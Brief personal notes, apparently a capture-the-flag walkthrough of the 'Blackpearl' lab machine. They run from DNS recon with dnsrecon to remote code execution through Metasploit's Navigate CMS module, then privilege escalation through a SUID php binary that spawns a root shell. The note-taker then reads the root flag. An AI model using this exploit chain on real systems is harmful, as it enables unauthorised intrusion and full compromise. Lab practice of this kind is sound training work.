Blackpearl

53 is DNS. The only other thing after nginx because it’s likely not OpenSSH

to recon DNS:

dnsrecon -r 127.0.0.0/24 -n 192.168.218.134 -d dick

-r is range

-n is target IP

-d is domain (put anything, doesn’t work without it)

We can add the DNS to our /etc/hosts

and then visit http://blackpearl.tcm

How to add that to Metasploit?:

use exploit/multi/http/navigate_cms_rce

set rhost 192.168.218.134

set vhost blackpearl.tcm

after meterpreter use:

shell

to jump in a shell.

We need to make TTY Shell which means we need Python. To check for Python do:

which python

finding files with SUID:

find / -type f -perm -4000 2>/dev/null

compare the services/files/folders to stuff on gtfobins

use SUID with PHP (in this case):

cd /usr/bin

php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"

whoami
cd /root
ls
cat flag.txt